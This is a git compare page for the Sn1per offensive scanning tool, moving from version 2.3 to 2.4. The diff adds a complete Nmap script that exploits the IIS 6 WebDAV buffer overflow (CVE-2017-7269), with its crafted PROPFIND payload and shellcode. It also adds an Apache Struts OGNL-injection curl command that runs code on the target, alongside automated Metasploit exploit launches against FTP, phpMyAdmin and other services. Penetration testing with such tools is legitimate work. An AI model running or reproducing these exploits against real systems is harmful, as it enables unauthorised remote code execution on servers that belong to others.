BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: BitMaster:v2.3
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a
...
compare: BitMaster:v2.4
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a

5 Commits
v2.3 ... v2.4

Author SHA1 Message Date
root
10399b6554 Sn1per by 1N3@CrowdShield 2017-04-09 19:30:00 -04:00
root
abeff50be3 Sn1per by 1N3@CrowdShield 2017-04-05 00:00:29 -04:00
root
ff22eb92ff Sn1per by 1N3@CrowdShield 2017-03-16 12:33:11 -04:00
root
fe4587a34c Sn1per by 1N3@CrowdShield 2017-02-18 13:15:38 -05:00
root
e190ab3b78 Sn1per by 1N3@CrowdShield 2017-02-16 10:46:58 -05:00
4 changed files with 265 additions and 49 deletions
Expand all files Collapse all files

12
CHANGELOG.md
View File

@@ -1,4 +1,12 @@
## CHANGELOG:
* v2.4 - Added detection for open X11 servers
* v2.4 - Added IIS6 Win2k3 RCE NMap script
* v2.4 - Added option to disable Google Hacking queries via Firefox
* v2.3d - Fixed issue with loot command
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes
* v2.2e - Changed NMap scan options (removed -P0 flag)
@@ -136,3 +144,7 @@
## FUTURE:
* Add auto logging and reporting to all scans
* Add HTML reporting for scans
* Add automated Wireless attacks to Sn1per
* Add automated MITM attacks to Sn1per
* Add web mode port option for customized web scans

181
bin/iis-buffer-overflow.nse Normal file
View File

@@ -0,0 +1,181 @@
local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"
-- NSE Buffer Overflow vulnerability in IIS
---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | iis-buffer-overflow:
-- | VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- | State: LIKELY_VULNERABLE
-- | Risk factor: High CVSS: 10.0
-- | Description:
-- | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- | service in Internet Information Services (IIS) 6.0
-- | in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- | arbitrary code via a long header beginning with "If: <http://" in a
-- | PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- | Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- | References:
-- | https://github.com/edwardz246003/IIS_exploit,
-- |_ https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--
author = {
"Zhiniang Peng", -- Original author
"Chen Wu", -- Original author
"Rewanth Cool" -- NSE script author
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}
portrule = shortport.portnumber(80, "tcp")
action = function(host, port)
local socket, response, try, catch, payload, shellcode, vulnerable_name
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
]],
IDS = {
CVE = 'CVE-2017-7269'
},
scores = {
CVSS = '10.0'
},
references = {
'https://github.com/edwardz246003/IIS_exploit',
'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
},
dates = {
disclosure = {year = '2017', month = '03', day = '26'},
}
}
-- If domain name doesn't exist this line of code takes ip into consideration
vulnerable_name = host.targetname or host.ip
socket = nmap.new_socket()
catch = function()
socket:close()
end
try = nmap.new_try(catch)
try(socket:connect(host, port))
-- Crafting the payload by parts
-- Crafting the request with HTTP PROPFIND method
payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
payload = payload .. '\xb3\xe3\x95\xb7'
-- Main payload (Do not edit this part)
payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
payload = payload .. '>'
payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
-- Main payload (Do not edit this part)
payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
-- Shellcode
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
payload = payload .. shellcode
payload = payload .. '>\r\n\r\n'
-- Exploiting the vulnerability
try(socket:send(payload))
-- We receive a 200 response if the payload succeeds.
response = try(socket:receive_bytes(80960))
socket:close()
-- Checking for 200 response in the response
local regex = "HTTP/1.1 (%d+)"
local status = string.match(response, regex)
if status == '200' then
-- Buffer overflow is successfully executed on the server.
vuln.state = vulns.STATE.EXPLOIT,
vuln.exploit_results = response
elseif status == '400' then
-- Bad request error is occured because webdav is not installed.
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 400: Install webdav and try again."
elseif status == '502' then
-- Likely to have an error in the Server Name
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
elseif status ~= nil then
vuln.exploit_results = response
end
return vuln_report:make_output(vuln)
end

3
install.sh
View File

@@ -47,6 +47,7 @@ echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
mkdir $PLUGINS_DIR
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -63,6 +64,8 @@ git clone https://github.com/nccgroup/shocker.git
git clone https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
cp $PWD/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh

118
sniper
View File

@@ -32,7 +32,7 @@
# sniper loot
#
VER="2.3"
VER="2.4"
TARGET="$1"
MODE="$2"
OPT1="$3"
@@ -65,6 +65,10 @@ AUTOBRUTE="1"
# DEFAULT IS "1" (ENABLED)
FULLNMAPSCAN="1"
# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
# DEFAULT IS "1" (ENABLED)
GOOHAK="1"
cd $INSTALL_DIR
function loot {
@@ -108,8 +112,8 @@ function loot {
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,outputs,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,outputs,reports,imports,notes,web}/ -p 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
iceweasel 2> /dev/null &
sleep 2
@@ -218,7 +222,7 @@ if [ "$MODE" = "discover" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
arp -a -n
echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
unicornscan $TARGET -p $DEFAULT_PORTS 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
unicornscan $TARGET 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
cat $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -537,9 +541,9 @@ if [ "$MODE" = "fullportonly" ]; then
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -T4 -sV -O -v -p 1-65535 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p 1-65535 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -T4 -sV -O -v -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p $OPT1 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
exit
@@ -645,13 +649,13 @@ ping -c 1 $TARGET
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 --open -P0 -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
elif [ "$OPT1" == "web" ]; then
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sV -T5 -P0 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 -P0 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 -p U:$OPT1 --open $TARGET
nmap -sU -T5 -P0 -p U:$OPT1 --open $TARGET
fi
if [ -z $DISABLE_POSTGRESQL ]; then service postgresql start; fi
@@ -711,7 +715,7 @@ then
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -723,7 +727,7 @@ else
cd $PLUGINS_DIR/ssh-audit
python ssh-audit.py $TARGET:22
cd $INSTALL_DIR
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
@@ -734,7 +738,7 @@ else
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
@@ -743,7 +747,7 @@ then
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
@@ -753,7 +757,7 @@ then
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ];
@@ -761,7 +765,7 @@ then
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET $USER_FILE
fi
@@ -831,14 +835,14 @@ else
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
nikto -h http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKRED[+]$RESET ;/Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -864,12 +868,18 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -882,7 +892,7 @@ then
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ];
@@ -914,7 +924,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
